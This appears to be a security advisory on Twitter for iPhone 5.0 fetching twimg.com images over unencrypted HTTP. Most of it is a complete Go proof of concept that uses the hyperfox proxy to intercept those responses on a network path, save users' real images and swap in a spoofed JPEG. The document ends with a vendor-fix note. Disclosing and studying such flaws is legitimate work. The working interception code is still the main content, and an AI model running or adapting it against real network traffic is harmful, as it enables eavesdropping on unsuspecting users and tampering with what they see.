Release date:
Updated on:
Affected Systems:
Twitter 5.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56665
Twitter is a social network and microblogging service. Its users post and read short messages from clients on wireless and wired networks, and it is a typical example of a microblogging application.
Twitter for iPhone 5.0 (and possibly other versions) is vulnerable to a partial man-in-the-middle attack. The application talks to the Twitter API over HTTPS, but the images it loads (avatars and other media) are fetched from *.twimg.com over plain, unencrypted HTTP. Anyone positioned on the network path — a rogue Wi-Fi access point, an ARP-spoofing host on the same LAN, or an upstream provider — can therefore observe those requests and replace the images shown in the application; the HTTPS protection of the API traffic does not extend to them.
<* Source: Carlos Reventlov
Link: http://www.mondounix.com/twitter-app-5-0-vulnerable-eavesdropping/
http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm
http://www.securityfocus.com/archive/1/524812/30/0/threaded
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure may be harmful and is intended only for security research and teaching. Use it at your own risk!
/*
Twitter App, eavesdropping PoC
Written by Carlos Reventlov <carlos@reventlov.com>
License MIT
*/
package main

import (
	"fmt"
	"io"
	"log"
	"os"
	"path"
	"path/filepath"
	"strconv"
	"strings"

	"github.com/xiam/hyperfox/proxy"
	"github.com/xiam/hyperfox/tools/logger"
)
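// imageFile is the local JPEG that is served in place of every image the
// client fetches from twimg.com. It is looked up relative to the working
// directory; init() aborts the program if it is missing.
const imageFile = "spoof.jpg"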
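// init fails fast at startup when the spoof image is missing, rather than on
// the first intercepted twimg.com response: the proxy is useless without it.
// The error message names the file so the operator knows what to provide.
func init() {
	if _, err := os.Stat(imageFile); err != nil {
		panic("spoof image " + imageFile + ": " + err.Error())
	}
}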
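// imageExt returns the extension the PoC associates with a response
// Content-Type, or "" for any type it does not recognise. Only the media
// type is compared; parameters such as "; charset=..." are ignored.
//
// Note that the extension is used purely as a "this is an image we want to
// archive" gate — the saved file keeps the name derived from the URL.
func imageExt(contentType string) string {
	if i := strings.IndexByte(contentType, ';'); i >= 0 {
		contentType = contentType[:i]
	}
	switch strings.ToLower(strings.TrimSpace(contentType)) {
	case "image/jpeg":
		return ".jpg"
	case "image/gif":
		return ".gif"
	case "image/png":
		return ".png"
	case "image/tiff":
		return ".tiff"
	}
	return ""
}

// isTwimgHost reports whether host (as found in the proxied request, possibly
// carrying a ":port" suffix) is twimg.com or one of its subdomains.
// A bare suffix test against "twimg.com" would also match unrelated names
// such as "nottwimg.com", so the domain boundary is checked explicitly.
func isTwimgHost(host string) bool {
	if i := strings.LastIndexByte(host, ':'); i >= 0 {
		host = host[:i]
	}
	host = strings.ToLower(host)
	return host == "twimg.com" || strings.HasSuffix(host, ".twimg.com")
}

// savePath returns the on-disk location under "saved/" for the proxied
// response named fileName, or an error if that name would escape the
// directory. fileName comes from the proxied URL, i.e. it is controlled by
// whoever answers the request, so it is cleaned as a rooted slash path first
// (".." cannot climb above "/") and the joined result is re-checked in OS
// form. An empty or root-only name is rejected as well.
func savePath(fileName string) (string, error) {
	rel := path.Clean("/" + fileName)
	file := filepath.Join("saved", filepath.FromSlash(rel))
	if !strings.HasPrefix(file, "saved"+string(filepath.Separator)) {
		return "", fmt.Errorf("refusing to save %q outside the saved directory", fileName)
	}
	return file, nil
}

// saveOriginal archives the upstream body to file, creating parent
// directories as needed. Write and close errors are reported to the caller
// instead of being dropped.
func saveOriginal(file string, body io.Reader) error {
	if err := os.MkdirAll(filepath.Dir(file), 0755); err != nil {
		return err
	}
	fp, err := os.Create(file)
	if err != nil {
		return fmt.Errorf("could not open file %s for writing: %v", file, err)
	}
	if _, err := io.Copy(fp, body); err != nil {
		fp.Close()
		return err
	}
	return fp.Close()
}

// replaceAvatar is the hyperfox interceptor implementing the PoC. For every
// response from twimg.com — the host the Twitter iOS client fetches images
// from over plain HTTP — it archives the real image under "saved/" when the
// Content-Type is a recognised image type, then substitutes the local spoof
// JPEG as the body and rewrites the headers to match. Responses from any
// other host pass through untouched.
//
// Differences from the first version of this PoC: the spoof image is only
// opened for twimg.com responses (previously a descriptor was leaked on every
// other request), every Stat/Open/Copy error is returned to the proxy instead
// of ignored, the upstream body is always closed before it is replaced, and
// the archive path is checked against directory traversal.
func replaceAvatar(pr *proxy.ProxyRequest) error {
	if !isTwimgHost(pr.Response.Request.Host) {
		return nil
	}

	// Whatever happens below, the upstream body is closed; once the spoof
	// body is installed this is the only reference left to it.
	upstream := pr.Response.Body
	if upstream != nil {
		defer upstream.Close()
	}

	// Archive the real image when there is a body and its type is one we
	// recognise. A ContentLength of -1 (unknown length) still counts as a body.
	if pr.Response.ContentLength != 0 && upstream != nil {
		if imageExt(pr.Response.Header.Get("Content-Type")) != "" {
			file, err := savePath(pr.FileName)
			if err != nil {
				return err
			}
			fmt.Printf("** Saving image.\n")
			if err := saveOriginal(file, upstream); err != nil {
				return err
			}
		}
	}

	image, err := os.Open(imageFile)
	if err != nil {
		return err
	}
	stat, err := image.Stat()
	if err != nil {
		image.Close()
		return err
	}

	fmt.Printf("** Sending bogus image.\n")
	pr.Response.ContentLength = stat.Size()
	pr.Response.Header.Set("Content-Type", "image/jpeg")
	pr.Response.Header.Set("Content-Length", strconv.FormatInt(stat.Size(), 10))
	// The spoof body is a raw JPEG; a Content-Encoding describing the
	// upstream body would make the client try to decode it.
	pr.Response.Header.Del("Content-Encoding")
	pr.Response.Body = image
	return nil
}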
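// main wires the PoC together: a hyperfox proxy with client- and server-side
// logging to stdout and replaceAvatar installed as the response interceptor.
// Start blocks while the proxy serves. If the listener cannot be bound the
// program now exits non-zero; the earlier version only logged the error and
// exited with status 0.
func main() {
	p := proxy.New()
	p.AddDirector(logger.Client(os.Stdout))
	p.AddInterceptor(replaceAvatar)
	p.AddLogger(logger.Server(os.Stdout))
	if err := p.Start(); err != nil {
		log.Fatalf("Failed to bind: %s.", err)
	}
}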
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Twitter
-------
The vendor has released an updated version of the application that fixes this issue. Update Twitter for iPhone from the App Store:
http://itunes.apple.com/cn/app/twitter/id333903271?mt=8